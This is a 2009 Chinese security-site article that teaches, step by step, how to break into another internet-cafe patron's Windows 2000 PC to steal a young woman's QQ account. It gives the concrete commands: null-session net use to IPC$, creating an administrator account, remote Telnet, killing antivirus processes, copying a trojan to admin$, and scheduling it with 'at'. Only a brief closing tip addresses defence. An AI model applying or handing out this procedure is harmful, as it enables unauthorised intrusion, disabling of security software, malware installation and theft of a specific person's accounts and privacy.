栏目导航: 首页 > 检测提权 > 提权渗透 > 内容

黑客网吧入侵所用到的命令与技巧

www.hx99.net    时间: 2009-01-09    阅读: 次     整理: 华西安全网

现在网吧管理软件有很多,但大多有这样或那样的漏洞,于是就出现了很多破解网吧软件和网吧软件破解技巧,可以免费上网,可以使用"命令提示符"方式,可以使用管理员权限等等。于是网吧也成了虚拟财产丢失最严重的地方。但只要网吧管理员的水平足够还是能够避免这种情况发生的。告诉你我以前还在网吧是如何得到 MMQQ号的技巧吧,有点复杂,主要是让你了解一些黑客入侵时所用到的命令。

    第一步:先要确定MM所用电脑的IP,网吧电脑的编号和IP地址通常是相同或是高一位,比如网吧中编号为20的电脑,IP一般是 192.168.0.20或192.168.0.21(192.168.0.1留给路由器),不仅如此,机器名也有规律,20号电脑的机器名通常是 Wangba20,这样只要知道了MM用的电脑,再进入到"命令提示符",Ping Wangba20就可以得到IP地址,比如192.168.0.20.

    第二步:有了IP,就可以开始连接上MM的电脑了,由于网吧内的电脑多使用没有打过补丁的Windows 2000,而且登录电脑的用户名也多是"user编号"的形式空密码形式,所以在"命令提示符"下输入net use //192.168.0.20/ipc$ "" /user:""及net use //192.168.0.20/ipc$ "" /user:"user20"命令建立连接。

    连接成功后,就要关闭对方电脑中的杀毒软件了,右击"我的电脑",选择"管理",在弹出窗口中右击"计算机管理(本地)",选择"连接到另一台计算机",连接至192.168.0.20,启动"Telnet"服务( "计算机管理"可以直接管理远程电脑)。

    第三步:在"命令提示符"下输入两条命令在本机新建user20用户并将它添加到管理员组。

    net user user20 /add

    net localgroup administrators user20 /add

    第四步:进入到C:\Winnt\System32,右击CMD.EXE,选择"创建快捷方式",然后右击新建的快捷方式,选择"属性",勾选"以其他用户身份运行"( 以其他用户身份运行程序)。运行快捷方式CMD,弹出"以其他用户身份运行"窗口后,输入"user20"回车。

    第五步:用telnet 192.168.0.20登录至MM的电脑,再从网上下载一个命令行下杀进程的软件,如knlps等

,在telnet上将杀毒软件的进程关闭。

    第六步:现在就可以下载一个木马,用"copy 木马名。exe //192.168.0.20/admin$"的方法将木马复制到MM的电脑上。再用net time //192.168.0.20得到MM电脑的时间,比如是下午4点,最后用"at //192.168.0.20 时间 木马名。exe",如"at //192.168.0.20 16:02 木马名。exe"命令在指定时间运行木马。

    有了木马了,自然就能知道MM用的QQ号啦。

    怎么样,网吧里面是不是很危险?不过你放心,并不是所有的网吧都这样,大部分网吧还是非常安全的,只要你在使用QQ或其他软件时,选择"网吧模式"就可以了( 点击"高级设置"后出现"登录模式"选项)。


本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭